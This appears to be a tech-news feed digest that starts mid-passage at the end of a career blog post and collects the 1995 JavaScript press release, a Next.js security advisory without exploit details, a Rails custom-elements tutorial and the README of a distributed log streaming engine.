  • Scale: Ingesting petabytes of data or processing billions of traces proves architectural resilience better than any design doc.

When you combine Criticality (VIP teams need this) with Utility (bugs are being fixed), you create a promotion case that is immune to executive reorganizations.

Archetypes and Agency

Staff Archetypes

I am far from the first to notice the idea of “there are multiple ways to be a staff software engineer”. In his book Staff Engineer , Will Larson categorizes Staff-plus engineers into four distinct archetypes.

Sean describes the Solver or the Right Hand : engineers who act as agents of executive will, dropping into fires and moving on once the problem is stabilized. I am describing the Architect or the Tech Lead : roles defined by long-term ownership of a specific domain and deep technical context.

The “Luck” Rebuttal

I can hear the criticism already: “You just got lucky finding your team. Most of us don’t have that luxury.”

There are two caveats to all my advice in this post. First, the strategy I have employed so far requires a company profitable enough to sustain long-term infrastructure. This path generally does not exist in startups or early growth companies; it is optimized for Big Tech.

Second, luck does play a role in landing on a good team. It is very hard to accurately evaluate team and company culture from the outside. But while finding the team might have involved luck, staying there for almost a decade was a choice .

And, at least in my experience, my team is not particularly special: I can name five other teams in Android alone 4 . Sure, they might have a director change here or a VP change there, but the core mission and the engineering team remained stable.

The reason these teams seem rare is not that they don’t exist, but that they are often ignored. Because they don’t offer the rapid, visible “wins” of a product launch nor are they working on the “shiny cool features”, they attract less competition. If you are motivated by “shipping to billions of users” or seeing your friends and family use something you built, you won’t find that satisfaction here. That is the price of admission.

But if you want to build long-term systems and are willing to trade external validation for deep technical ownership, you just need to look behind the curtain.

Conclusion

The tech industry loves to tell you to move fast. But there is another path. It is a path where leverage comes from depth, patience, and the quiet satisfaction of building the foundation that others stand on.

You don’t have to chase the spotlight to have a meaningful, high-impact career at a big company. Sometimes, the most ambitious thing you can do is stay put, dig in, and build something that lasts. To sit with a problem space for years until you understand it well enough to build a Bigtrace.

If you enjoyed this post, you can subscribe to my weekly roundup of recent posts, or follow via RSS .

30 years ago today "Netscape and Sun announce JavaScript"

Hacker News
web.archive.org
2025-12-04 11:32:00
Comments...
Original Article
Press Releases

N ETSCAPE AND S UN A NNOUNCE J AVA S CRIPT, THE O PEN, C ROSS-PLATFORM O BJECT S CRIPTING L ANGUAGE FOR E NTERPRISE N ETWORKS AND THE I NTERNET

28 I NDUSTRY-LEADING C OMPANIES TO E NDORSE J AVA S CRIPT AS A C OMPLEMENT TO J AVA FOR E ASY O NLINE A PPLICATION D EVELOPMENT


MOUNTAIN VIEW, Calif. (December 4, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) and Sun Microsystems, Inc. (NASDAQ:SUNW), today announced JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the Internet. The JavaScript language complements Java, Sun's industry-leading object-oriented, cross-platform programming language. The initial version of JavaScript is available now as part of the beta version of Netscape Navigator 2.0, which is currently available for downloading from Netscape's web site.

In addition, 28 industry-leading companies, including America Online, Inc., Apple Computer, Inc., Architext Software, Attachmate Corporation, AT&T;, Borland International, Brio Technology, Inc., Computer Associates, Inc., Digital Equipment Corporation, Hewlett-Packard Company, Iconovex Corporation, Illustra Information Technologies, Inc., Informix Software, Inc., Intuit, Inc., Macromedia, Metrowerks, Inc., Novell, Inc., Oracle Corporation, Paper Software, Inc., Precept Software, Inc., RAD Technologies, Inc., The Santa Cruz Operation, Inc., Silicon Graphics, Inc., Spider Technologies, Sybase, Inc., Toshiba Corporation, Verity, Inc., and Vermeer Technologies, Inc., have endorsed JavaScript as an open standard object scripting language and intend to provide it in future products. The draft specification of JavaScript, as well as the final draft specification of Java, is planned for publishing and submission to appropriate standards bodies for industry review and comment this month.

JavaScript is an easy-to-use object scripting language designed for creating live online applications that link together objects and resources on both clients and servers. While Java is used by programmers to create new objects and applets, JavaScript is designed for use by HTML page authors and enterprise application developers to dynamically script the behavior of objects running on either the client or the server. JavaScript is analogous to Visual Basic in that it can be used by people with little or no programming experience to quickly construct complex applications. JavaScript's design represents the next generation of software designed specifically for the Internet and is:

  • designed for creating network-centric applications
  • complementary to and integrated with Java
  • complementary to and integrated with HTML
  • open and cross-platform.
Java, developed by Sun, is an object-oriented programming language that operates independent of any operating system or microprocessor. Java programs called applets can be transmitted over a network and run on any client, providing the multimedia richness of a CD-ROM over corporate networks and the Internet. Java has been widely hailed by programmers because it eliminates the need to port applications, and by managers of information systems for its potential to lower the costs of distributing and maintaining applications across the network.

With JavaScript, an HTML page might contain an intelligent form that performs loan payment or currency exchange calculations right on the client in response to user input. A multimedia weather forecast applet written in Java can be scripted by JavaScript to display appropriate images and sounds based on the current weather readings in a region. A server-side JavaScript script might pull data out of a relational database and format it in HTML on the fly. A page might contain JavaScript scripts that run on both the client and the server. On the server, the scripts might dynamically compose and format HTML content based on user preferences stored in a relational database, and on the client, the scripts would glue together an assortment of Java applets and HTML form elements into a live interactive user interface for specifying a net-wide search for information.

Java programs and JavaScript scripts are designed to run on both clients and servers, with JavaScript scripts used to modify the properties and behavior of Java objects, so the range of live online applications that dynamically present information to and interact with users over enterprise networks or the Internet is virtually unlimited. Netscape will support Java and JavaScript in client and server products as well as programming tools and applications to make this vision a reality.

"Programmers have been overwhelmingly enthusiastic about Java because it was designed from the ground up for the Internet. JavaScript is a natural fit, since it's also designed for the Internet and Unicode-based worldwide use," said Bill Joy, co-founder and vice president of research at Sun. "JavaScript will be the most effective method to connect HTML-based content to Java applets."

Netscape's authoring and application development tools -- Netscape Navigator Gold 2.0, Netscape LiveWire and Netscape LiveWire Pro -- are designed for rapid development and deployment of JavaScript applications. Netscape Navigator Gold 2.0 enables developers to create and edit JavaScript scripts, while Netscape LiveWire enables JavaScript programs to be installed, run and managed on Netscape servers, both within the enterprise and across the Internet. Netscape LiveWire Pro adds support for JavaScript connectivity to high-performance relational databases from Illustra, Informix, Microsoft, Oracle and Sybase. Java and JavaScript support are being built into all Netscape products to provide a unified, front-to-back, client/server/tool environment for building and deploying live online applications.

Java is available to developers free of charge. The Java Compiler and Java Developer's Kit as well as the HotJava browser and related documentation are available from Sun's web site at http://java.sun.com. In addition, the Java source code can be licensed for a fee. Details on licensing are also available via the java.sun.com web page. To date, Sun has licensed Java to a number of leading technology companies, including Borland, Macromedia, Mitsubishi, Netscape, Oracle, Silicon Graphics, Spyglass, and Toshiba. Sun's Workshop for Java toolkit is scheduled for release in Spring 1996. Sun's NEO product family, the first complete development, operating and management environment for object-oriented networked applications, will also use Java-enabled browsers as front-ends to the NEO environment.

Netscape and Sun plan to propose JavaScript to the W3 Consortium (W3C) and the Internet Engineering Task Force (IETF) as an open Internet scripting language standard. JavaScript will be an open, freely licensed proposed standard available to the entire Internet community. Existing Sun Java licensees will receive a license to JavaScript. In addition, Sun and Netscape intend to make a source code reference implementation of JavaScript available for royalty-free licensing, further encouraging its adoption as a standard in a wide variety of products.

Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.

With annual revenues of $6 billion, Sun Microsystems, Inc. provides solutions that enable customers to build and maintain open network computing environments. Widely recognized as a proponent of open standards, the company is involved in the design, manufacture and sale of products, technologies and services for commercial and technical computing. Sun's SPARC(TM) workstations, multiprocessing servers, SPARC microprocessors, Solaris operating software and ISO-certified service organization each rank No. 1 in the UNIX(R) industry. Founded in 1982, Sun is headquartered in Mountain View, Calif., and employs more than 14,000 people worldwide.

Additional information on Netscape Communications Corporation is available on the Internet at , by sending email to info@netscape.com or by calling 415-528-2555. Additional information on Sun Microsystems is available on the Internet at http://www.sun.com or, for Java information, http://java.sun.com Netscape Communications, the Netscape Communications logo, Netscape, and Netscape Navigator are trademarks of Netscape Communications Corporation. JavaScript and Java are trademarks of Sun Microsystems, Inc. All other product names are trademarks of their respective companies.

WHAT COMPANIES SAY ABOUT JAVASCRIPT

"JavaScript brings the power of rapid multimedia application development with cross-platform mobility at both the operating system and architecture level. We are pleased to integrate this powerful language into our Developer's Program."
Mike Connors
President
America Online Technologies
"JavaScript will allow us to easily create personalized applets for the Excite service. These applets, combined with the rich functionality of the Excite service, will integrate more fully into the users experience as they explore and navigate the Internet."
Graham Spencer
Chief Technology Officer
Architext Software
"AT&T;'s support for JavaScript is more than support for cool technology -- it is support for an open standards process. Open standards are and will be as important to the success of the Internet as open connectivity."
Tom Evslin
Vice President, Gateway Services
AT&T;
"JavaScript and Java represent important steps in the evolution of the Internet and Intranets for business computing. JavaScript allows Internet applications to easily connect to production databases such as CA-OpenIngres, while Java allows easy-to-use, multi-platform Web clients for CA-Unicenter and business applications such as CA-Masterpiece, CA-ManMan/X and CA-Accpac."
Nancy Li
Executive Vice President and CTO
Computer Associates
"Tools like JavaScript will unleash a new wave of creativity and transform the Internet in ways no one can predict. JavaScript and other developments will demand increased system performance, ideally met by Digital's Alpha systems architecture."
Rose Ann Giordano
Vice President, Internet Business Group
Digital Equipment Corporation
"JavaScript is an exciting technology because it represents the next generation of software designed specifically for the Internet. Hewlett-Packard is committed to open standards and is a supporter of JavaScript because it complements Hewlett-Packard's open systems architecture."
Jan Silverman
Director
Hewlett-Packard
"We plan to integrate our automatic document indexing and abstracting technology to leverage the power and functionality of JavaScript. The power and use of our technologies greatly enhances the server and its delivery of timely and valuable documents for web clients."
Robert Griggs
Vice President, Sales and Marketing
Iconovex Corporation
"JavaScript empowers developers to create a powerful new class of multimedia rich applications in a platform-independent development environment. Illustra's unique extensible Object-Relational architecture makes it an ideal intelligent queryable store for content management applications using Java and JavaScript objects."
Dr. Michael Stonebraker
Founder and Chief Technology Officer
Illustra Information Technologies
"JavaScript will benefit users by enabling live online applications. These applications need a powerful database engine for content management. Informix's OnLine Dynamic Server is uniquely suited for these applications. By partnering with Netscape, we are bringing the best in online database and live, interactive technology to web users."
Phil White
Chairman and CEO
Informix Software
"Intuit will take advantage of JavaScript and Netscape's authoring and application development tools to create compelling online financial services. Netscape's open, cross-platform environment allows Intuit to efficiently develop and deploy online applications."
Bill Harris
Executive Vice President
Intuit
"JavaScript is a great way to get cross-platform scriptable access to databases and move the resulting data into Macromedia Shockwave, where it can be rendered, animated and made into live interactive multimedia for the Internet. JavaScript is also a promising core technology for the new multimedia publishing tool that Macromedia is building."
Bud Colligan
President and CEO
Macromedia
"The creation of a general, standard scripting language for Java development will accelerate adoption of this new, exciting technology for delivering dynamic, live content to the consumer. Metrowerks will support JavaScript as part of our effort to deliver tools for Java as the programming platform of choice for new Internet development."
Greg Galanos
President and CEO
Metrowerks, Inc.
"Paper Software plans to use JavaScript as the glue which lets our development partners couple Java, plug-ins, and Paper's multi-dimensional VRML user interfaces within a distributed, online application."
Mike McCue
Chief Executive Officer
Paper Software
"JavaScript is a perfect complement to the software Precept is developing to let the Internet and corporate Intranets effectively handle real-time multimedia traffic. By serving as a means to integrate our products into web solutions, JavaScript will enable a wide range of web-based software to take advantage of real-time audio and video."
Judy Estrin
Precept Software
"SCO looks forward to supporting the JavaScript language on both our OpenServer and UnixWare product lines. JavaScript will enable developers to create substantially more stimulating and interactive web-based applications than ever before, giving them the edge they need to compete for the attention of the increasingly sophisticated population of Internet users."
Richard Treadway
Vice President, Layered Products
SCO
"JavaScript is an exact match for Silicon Graphics suite of content creation and application development tools. This combination will benefit the industry by enabling the development of a richer set of interactive applications."
Tom Jermoluk
President and COO
Silicon Graphics
"Spider will integrate open and emerging Internet standards such as JavaScript into our product offering. Spider is committed to providing the most advanced solution for visual development and high performance deployment of commercial Web/database applications."
Zack Rinat
President and CEO
Spider Technologies
"The Java and JavaScript languages will serve an important role in allowing Internet applications to take advantage of enterprise client/server computing. Sybase will enable our customers to utilize these languages as one of several ways to provide Internet access to the entire Sybase architecture in a high performance, customer-centric, safe environment."
Mitchell Kertzman
Executive Vice President and CEO
Sybase's Powersoft Division
"Java is tremendously interesting to Verity as a powerful tool to provide dynamic display capabilities and client-side manipulation of results from our Search and Agent platforms. Configurability is a key strength of Verity servers, and the availability of JavaScript provides an ideal tool for non-programmers to harness the power of Java objects to customize the look and feel of their Verity applications."
Steve Zocchi
Director, Internet Marketing
Verity
"The client-server, multi-vendor, cross-platform nature of JavaScript is a natural fit with the Vermeer FrontPage web authoring system. Tracking innovative, enabling Web technologies is an important priority for Vermeer, and we are moving quickly to incorporate the JavaScript language into Front Page and future products."
John R. Mandle
Chief Executive Officer
Vermeer Technologies

Company Contacts:

America Online, Inc. Pam Mcgraw: (703) 556-3746
Apple Computer, Inc. Nancy Morrison: (408) 862-6200
Architext Software Mike Brogan/Roederer-Johnson: (415) 802-1850
AT&T; Mary Whelan: (908) 658-6000
Borland International Bill Jordan: (408) 431-4721
Brio Technology, Inc. Yorgen Edholm: yhe@brio.com
Computer Associates, Inc. Yogesh Gupta: (516) 342-4045
Digital Equipment Corporation Ethel Kaiden: (508) 486-2814
Hewlett-Packard Company Bill Hodges: (408) 447-7041
Iconovex Corporation Robert Griggs: (800) 943-0292
Illustra Information Technologies, Inc. Sandra Bateman: (510) 873-62 09
Informix Software, Inc. Cecilia Denny: (415) 926-6420
Intuit, Inc. Sheryl Ross: (415) 329-3569
Macromedia Miles Walsh: (415) 252-2000
Metrowerks, Inc. Greg Galanos: gpg@austin.metrowerks.com
Novell, Inc. Christine Hughes: (408) 577-7453
Oracle Corporation Mark Benioff: (415) 506-7000
Paper Software, Inc. Mike Mccue: (914) 679-2440
Precept Software, Inc. Judy Estrin: (408) 446-7600
RAD Technologies, Inc. Jeff Morgan: jmorgan@rad.com
The Santa Cruz Operation, Inc. Marty Picco: (408) 425-7222
Silicon Graphics, Inc. Virginia Henderson: (415) 933-1306
Spider Technologies Diana Jovin: (415) 969-6128
Sybase, Inc. Robert Manetta: (510) 922-5742
Verity, Inc. Marguerite Padovani: (415) 960-7724
Vermeer Technologies, Inc. Ed Cuoco: (617) 576-1700x130

Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.

Netscape Communications, the Netscape Communications logo, Netscape, Netscape Commerce Server, Netscape Communications Server, Netscape Proxy Server and Netscape News Server are trademarks of Netscape Communications Corporation. NCSA Mosaic is a trademark of the University of Illinois. All other product names are trademarks of their respective companies.


© 1999 Netscape, All Rights Reserved. Legal & Privacy Notices
This site powered by Netscape SuiteSpot servers .

NextJS Security Vulnerability

Hacker News
nextjs.org
2025-12-04 11:14:04
Comments...
Original Article

A critical vulnerability has been identified in the React Server Components (RSC) protocol. The issue is rated CVSS 10.0 and can allow remote code execution when processing attacker-controlled requests in unpatched environments.

This vulnerability originates in the upstream React implementation ( CVE-2025-55182 ). This advisory ( CVE-2025-66478 ) tracks the downstream impact on Next.js applications using the App Router.

Impact

The vulnerable RSC protocol allowed untrusted inputs to influence server-side execution behavior. Under specific conditions, an attacker could craft requests that trigger unintended server execution paths. This can result in remote code execution in unpatched environments.

Affected Next.js Versions

Applications using React Server Components with the App Router are affected when running:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 and later canary releases

Next.js 13.x, Next.js 14.x stable, Pages Router applications, and the Edge Runtime are not affected.

Fixed Versions

The vulnerability is fully resolved in the following patched Next.js releases:

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 15.3.6
  • 15.4.8
  • 15.5.7
  • 16.0.7

These versions include the hardened React Server Components implementation.

Required Action

All users should upgrade to the latest patched version in their release line:

If you are on Next.js 14.3.0-canary.77 or a later canary release, downgrade to the latest stable 14.x release:

There is no configuration option to disable the vulnerable code path.

Discovery

Thank you to Lachlan Davidson for discovering and responsibly disclosing this vulnerability. We are intentionally limiting technical detail in this advisory to protect developers who have not yet upgraded.

References

Building optimistic UI in Rails (and learn custom elements)

Hacker News
railsdesigner.com
2025-12-04 11:03:16
Comments...
Original Article

Custom elements are one of those web platform features that sound complicated but turn out to be surprisingly simple. If you have used Hotwire in Rails, you have already used them. Both <turbo-frame> and <turbo-stream> are custom elements . They are just HTML tags with JavaScript behavior attached.

This article walks through what custom elements are, how they compare to Stimulus controllers and how to build them yourself! Starting with a simple counter and ending with an optimistic form that updates instantly without waiting for the server . 🤯

The code is available on GitHub .

What are custom elements?

Custom elements let you define your own HTML tags with custom behavior. They fall under the Web Components umbrella, alongside Shadow DOM (encapsulated styling and markup) and templates (reusable HTML fragments), though each can be used independently. To use custom elements, just define a class, register it with the browser, and use your new tag anywhere (Shadow DOM or templates not required).

Here is the simplest possible custom element:

class HelloWorld extends HTMLElement {
  connectedCallback() {
    this.textContent = "Hello from a custom element 👋"
  }
}

customElements.define("hello-world", HelloWorld)

Now you can use <hello-world></hello-world> in your HTML and it will display the message. The connectedCallback runs when the element is added to the page. This is similar to Stimulus’s connect() method. There is also, just like with Stimulus, a disconnectedCallback . This can be used similar to Stimulus’: removing event listeners and so on.

Custom element names must contain a hyphen. This prevents conflicts with future HTML elements. So <hello-world> works, but <helloworld> does not.

Attributes and properties

Custom elements can read attributes just like regular HTML elements:

class GreetUser extends HTMLElement {
  connectedCallback() {
    const name = this.getAttribute("name") || "stranger"

    this.textContent = `Hello, ${name}!`
  }
}

customElements.define("greet-user", GreetUser)

Use it like this:

<greet-user name="Cam"></greet-user>

To react to attribute changes, use attributeChangedCallback :

class GreetUser extends HTMLElement {
  static observedAttributes = ["name"]

  connectedCallback() {
    this.#render()
  }

  attributeChangedCallback(name, oldValue, newValue) {
    this.#render()
  }

  // private

  #render() {
    const name = this.getAttribute("name") || "stranger"

    this.textContent = `Hello, ${name}!`
  }
}

The observedAttributes array tells the browser which attributes to watch. Without it, attributeChangedCallback never fires.

The is attribute

You can extend built-in HTML elements using the is attribute. For example, extending a button:

class FancyButton extends HTMLButtonElement {
  connectedCallback() {
    this.classList.add("fancy")
  }
}

customElements.define("fancy-button", FancyButton, { extends: "button" })

Then use it like:

<button is="fancy-button">Click me</button>

This keeps all the built-in button behavior while adding your custom features (simply adding the fancy class in above example). However, Safari does not support this feature . So I stick to autonomous custom elements (the hyphenated tags) for better compatibility.

Custom elements vs Stimulus

If you have used Stimulus, custom elements will feel familiar. Here is how they compare:

Feature Stimulus Custom Element
Lifecycle connect() / disconnect() connectedCallback() / disconnectedCallback()
Finding elements targets querySelector() / direct children
State values attributes + properties
Events action attributes addEventListener()
Framework Requires Stimulus Browser-native

Stimulus is great for connecting behavior to existing HTML. Custom elements are better when you want a reusable component that works anywhere. They are also simpler when you do not need Stimulus’s conventions.

The main difference is how you find elements. Stimulus uses targets:

<div data-controller="counter">
  <span data-counter-target="count">0</span>

  <button data-action="click->counter#increment">+</button>
</div>

Custom elements use standard DOM/query methods (see example below):

<click-counter>
  <span class="count">0</span>

  <button>+</button>
</click-counter>

Custom elements feel more like writing vanilla JavaScript. Stimulus is more convention-based (which is often confusing to many).

In the end it is all a regular JavaScript class. I’ve explored these extensively in the book JavaScript for Rails Developers . 💡

Building a simple counter

Time to build something. Start with a counter that increments when clicked:

// app/javascript/components/click_counter.js
class ClickCounter extends HTMLElement {
  connectedCallback() {
    this.count = 0

    this.addEventListener("click", () => this.#increment())
  }

  #increment() {
    this.count++

    this.querySelector("span").textContent = this.count
  }
}

customElements.define("click-counter", ClickCounter)

Import it in your application JavaScript:

// app/javascript/application.js
import "@hotwired/turbo-rails"
import "controllers"

import "components/click_counter"

Configure importmap to find the new directory:

# config/importmap.rb
pin_all_from "app/javascript/controllers", under: "controllers"

pin_all_from "app/javascript/components", under: "components"

Now use it in your views:

<click-counter>
  <button>Clicked <span>0</span> times</button>
</click-counter>

Click the button and watch the counter increment. Simple! 😊

Building an optimistic form

Now for something a bit more useful. Build a form that updates instantly without waiting for the server. If the save fails, show an error. If it succeeds, keep the optimistic UI.

It will look like this:

See how the message gets appended immediately and then (notice the blue Turbo progress bar) gets replaced with the server rendered version.

The HTML looks like this:

<optimistic-form>
  <form action="<%= messages_path %>" method="post">
    <%= hidden_field_tag :authenticity_token, form_authenticity_token %>

    <%= text_area_tag "message[content]", "", placeholder: "Write a message…", required: true %>

    <%= submit_tag "Send" %>
  </form>

  <template response>
    <%= render Message.new(content: "", created_at: Time.current) %>
  </template>
</optimistic-form>

The <template response> tag (indeed also part of the Web Components standard) holds the display HTML for new messages. When the form submits, the custom element renders this template with the form values and appends it to the list. The form still submits normally to Rails.

Start with the basic structure:

// app/javascript/components/optimistic_form.js
class OptimisticForm extends HTMLElement {
  connectedCallback() {
    this.form = this.querySelector("form")
    this.template = this.querySelector("template[response]")
    this.target = document.querySelector("#messages")

    this.form.addEventListener("submit", () => this.#submit())
  }

  #submit() {
    if (!this.form.checkValidity()) return

    const formData = new FormData(this.form)
    const optimisticElement = this.#render(formData)

    this.target.append(optimisticElement)
  }
}

customElements.define("optimistic-form", OptimisticForm)

The submit method checks form validity first using the browser’s built-in validation. If the form is invalid, let the browser show its validation messages. Otherwise render the optimistic UI and let the form submit normally.

Getting optimistic

Extract the form data and populate the template:

#render(formData) {
  const element = this.template.content.cloneNode(true).firstElementChild

  element.id = "optimistic-message"

  for (const [name, value] of formData.entries()) {
    const field = element.querySelector(`[data-field="${name}"]`)

    if (field) field.textContent = value
  }

  return element
}

The cloneNode(true) creates a copy of the template content. Loop through the form data and update any element with a matching data-field attribute. This is why the partial has a data-field="message[content]" on the message display.

The optimistic element appears in the list immediately, then the form submits to Rails.

The Turbo Stream does not append the message, but replaces the “optimistic message” with the real one from the database:

<%# app/views/messages/create.turbo_stream.erb %>
<%= turbo_stream.replace "optimistic-message", @message %>

Since both the optimistic template and the message partial render the same HTML, the replacement is seamless. The user sees the message appear instantly, then it gets replaced with the real version (with the correct ID, timestamp, etc.) a moment later.

Here is the full implementation:

// app/javascript/components/optimistic_form.js
class OptimisticForm extends HTMLElement {
  connectedCallback() {
    this.form = this.querySelector("form")
    this.template = this.querySelector("template[response]")
    this.target = document.querySelector("#messages")

    this.form.addEventListener("submit", () => this.#submit())
    this.form.addEventListener("turbo:submit-end", () => this.#reset())
  }

  // private

  #submit() {
    if (!this.form.checkValidity()) return

    const formData = new FormData(this.form)
    const optimisticElement = this.#render(formData)

    this.target.append(optimisticElement)
  }

  #render(formData) {
    const element = this.template.content.cloneNode(true).firstElementChild

    element.id = "optimistic-message"

    for (const [name, value] of formData.entries()) {
      const field = element.querySelector(`[data-field="${name}"]`)

      if (field) field.textContent = value
    }

    return element
  }

  #reset() {
    this.form.reset()
  }
}

customElements.define("optimistic-form", OptimisticForm)

Do not forget to import it:

// app/javascript/application.js
import "components/optimistic_form"

Now when you submit the form, the message appears instantly in the list. The form submits to Rails, which responds with a Turbo Stream (I added sleep to mimic a slow response) that replaces the optimistic message with the real one. If the save fails, Rails can show an error message normally.

Cool, right? I’ve used this technique before with a client successfully. Many months later and it holds up nicely.


This pattern can work great for any form where you want instant feedback. Like chat messages, comments or todos. The new item appears immediately. No loading spinners, no waiting.

The key is that the partial lives right within the template element. You are not duplicating it in JavaScript. Change the partial and the optimistic UI updates automatically.

Custom elements make this pattern reusable. Drop <optimistic-form> anywhere in your app. It works with any form and any partial (with client’s project mentioned above I stubbed the partial with more advanved “stand-in” model instance).

Yet another tool in your Rails toolkit. Did this inspire you to use custom elements more too? Let me know below! ❤️

walrus (High Performance distributed log streaming engine)

Lobsters
github.com
2025-12-04 10:58:11
Comments...
Original Article

walrus

Walrus: A Distributed Message Streaming Engine

Crates.io Documentation CI License: MIT

Walrus is a distributed message streaming platform built on a high-performance log storage engine. It provides fault-tolerant streaming with automatic leadership rotation, segment-based partitioning, and Raft consensus for metadata coordination.

Walrus Demo

Key Features:

  • Automatic load balancing via segment-based leadership rotation
  • Fault tolerance through Raft consensus (3+ nodes)
  • Simple client protocol (connect to any node, auto-forwarding)
  • Sealed segments for historical reads from any replica
  • High-performance storage with io_uring on Linux

Architecture

System Overview

Walrus Architecture

Producers and consumers connect to any node (or via load balancer). The cluster automatically routes requests to the appropriate leader and manages segment rollovers for load distribution.

Node Internals

Walrus Node Architecture

Each node contains four key components: Node Controller (routing and lease management), Raft Engine (consensus for metadata), Cluster Metadata (replicated state), and Bucket Storage (Walrus engine with write fencing).

Core Components

Node Controller

  • Routes client requests to appropriate segment leaders
  • Manages write leases (synced from cluster metadata every 100ms)
  • Tracks logical offsets for rollover detection
  • Forwards operations to remote leaders when needed

Raft Engine (Octopii)

  • Maintains Raft consensus for metadata changes only (not data!)
  • Handles leader election and log replication
  • Syncs metadata across all nodes via AppendEntries RPCs

Cluster Metadata (Raft State Machine)

  • Stores topic → segment → leader mappings
  • Tracks sealed segments and their entry counts
  • Maintains node addresses for routing
  • Replicated identically across all nodes

Storage Engine

  • Wraps Walrus engine with lease-based write fencing
  • Only accepts writes if node holds lease for that segment
  • Stores actual data in WAL files on disk
  • Serves reads from any segment (sealed or active)

Quick Start

Running a 3-Node Cluster

cd distributed-walrus

make cluster-bootstrap

# Interact via CLI
cargo run --bin walrus-cli -- --addr 127.0.0.1:9091

# In the CLI:

# create a topic named 'logs'
> REGISTER logs

# produce a message to the topic
> PUT logs "hello world"

# consume message from topic
> GET logs

# get the segment states of the topic
> STATE logs

# get cluster state
> METRICS

Client Protocol

Simple length-prefixed text protocol over TCP:

Wire format:
  [4 bytes: length (little-endian)] [UTF-8 command]

Commands:
  REGISTER <topic>       → Create topic if missing
  PUT <topic> <payload>  → Append to topic
  GET <topic>            → Read next entry (shared cursor)
  STATE <topic>          → Get topic metadata (JSON)
  METRICS                → Get Raft metrics (JSON)

Responses:
  OK [payload]           → Success
  EMPTY                  → No data available (GET only)
  ERR <message>          → Error

See distributed-walrus/docs/cli.md for detailed CLI usage.

Key Features

Segment-Based Sharding

  • Topics split into segments (~1M entries each by default)
  • Each segment has a leader node that handles writes
  • Leadership rotates round-robin on segment rollover
  • Automatic load distribution across cluster

Lease-Based Write Fencing

  • Only the leader for a segment can write to it
  • Leases derived from Raft-replicated metadata
  • 100ms sync loop ensures lease consistency
  • Prevents split-brain writes during leadership changes

Sealed Segment Reads

  • Old segments "sealed" when rolled over
  • Original leader retains sealed data for reads
  • Reads can be served from any replica with the data
  • No data movement required during rollover

Automatic Rollover

  • Monitor loop (10s) checks segment sizes
  • Triggers rollover when threshold exceeded
  • Proposes metadata change via Raft
  • Leader transfer happens automatically

Configuration

CLI Flags

Flag Default Description
--node-id (required) Unique node identifier
--data-dir ./data Root directory for storage
--raft-port 6000 Raft/Internal RPC port
--raft-host 127.0.0.1 Raft bind address
--raft-advertise-host (raft-host) Advertised Raft address
--client-port 8080 Client TCP port
--client-host 127.0.0.1 Client bind address
--join - Address of existing node to join

Environment Variables

Variable Default Description
WALRUS_MAX_SEGMENT_ENTRIES 1000000 Entries before rollover
WALRUS_MONITOR_CHECK_MS 10000 Monitor loop interval
WALRUS_DISABLE_IO_URING - Use mmap instead of io_uring
RUST_LOG info Log level (debug, info, warn)

Testing

Comprehensive test suite included:

cd distributed-walrus

# Run all tests
make test

# Individual tests
make cluster-test-logs         # Basic smoke test
make cluster-test-rollover     # Segment rollover
make cluster-test-resilience   # Node failure recovery
make cluster-test-recovery     # Cluster restart persistence
make cluster-test-stress       # Concurrent writes
make cluster-test-multi-topic  # Multiple topics

Performance

  • Write throughput : Single writer per segment (lease-based)
  • Read throughput : Scales with replicas (sealed segments)
  • Latency : ~1-2 RTT for forwarded ops + storage latency
  • Consensus overhead : Metadata only (not data path)
  • Segment rollover : ~1M entries default (~100MB depending on payload size)

Correctness

Walrus includes a formal TLA+ specification of the distributed data plane that models segment-based sharding, lease-based write fencing, and cursor advancement across sealed segments.

Specification: distributed-walrus/spec/DistributedWalrus.tla

Verified Invariants

  • Domain Consistency : Topic metadata, WAL entries, and reader cursors stay synchronized
  • Single Writer per Segment : Only the designated leader can write to each segment
  • No Writes Past Open Segment : Closed segments remain immutable after rollover
  • Sealed Counts Stable : Entry counts for sealed segments match actual WAL contents
  • Read Cursor Bounds : Cursors never exceed segment boundaries or entry counts
  • Sequential Write Order : Entries within each segment maintain strict ordering

Liveness Properties

  • Rollover Progress : Segments exceeding the entry threshold eventually roll over
  • Read Progress : Available entries eventually get consumed by readers

The specification abstracts Raft consensus as a single authoritative metadata source and models Walrus storage as per-segment entry sequences. Model checking with TLC verifies correctness under concurrent operations

Storage Engine Benchmarks

The underlying storage engine delivers exceptional performance:

Walrus vs RocksDB vs Kafka - No Fsync

System Avg Throughput (writes/s) Avg Bandwidth (MB/s) Max Throughput (writes/s) Max Bandwidth (MB/s)
Walrus 1,205,762 876.22 1,593,984 1,158.62
Kafka 1,112,120 808.33 1,424,073 1,035.74
RocksDB 432,821 314.53 1,000,000 726.53

Walrus vs RocksDB vs Kafka - With Fsync

System Avg Throughput (writes/s) Avg Bandwidth (MB/s) Max Throughput (writes/s) Max Bandwidth (MB/s)
RocksDB 5,222 3.79 10,486 7.63
Walrus 4,980 3.60 11,389 8.19
Kafka 4,921 3.57 11,224 8.34

Benchmarks compare single Kafka broker (no replication, no networking overhead) and RocksDB's WAL against the legacy append_for_topic() endpoint using pwrite() syscalls (no io_uring batching).

Documentation

Using Walrus as a Library

The core Walrus storage engine is also available as a standalone Rust library for embedded use cases:

Crates.io Documentation

[dependencies]
walrus-rust = "0.2.0"
use walrus_rust::{Walrus, ReadConsistency};

// Create a new WAL instance
let wal = Walrus::new()?;

// Write data to a topic
wal.append_for_topic("my-topic", b"Hello, Walrus!")?;

// Read data from the topic
if let Some(entry) = wal.read_next("my-topic", true)? {
    println!("Read: {:?}", String::from_utf8_lossy(&entry.data));
}

See the standalone library documentation for single node usage, configuration options, and API reference.

Contributing

We welcome patches, check CONTRIBUTING.md for the workflow.

License

This project is licensed under the MIT License, see the LICENSE file for details.

Changelog

Version 0.3.0

  • New : Distributed message streaming platform with Raft consensus
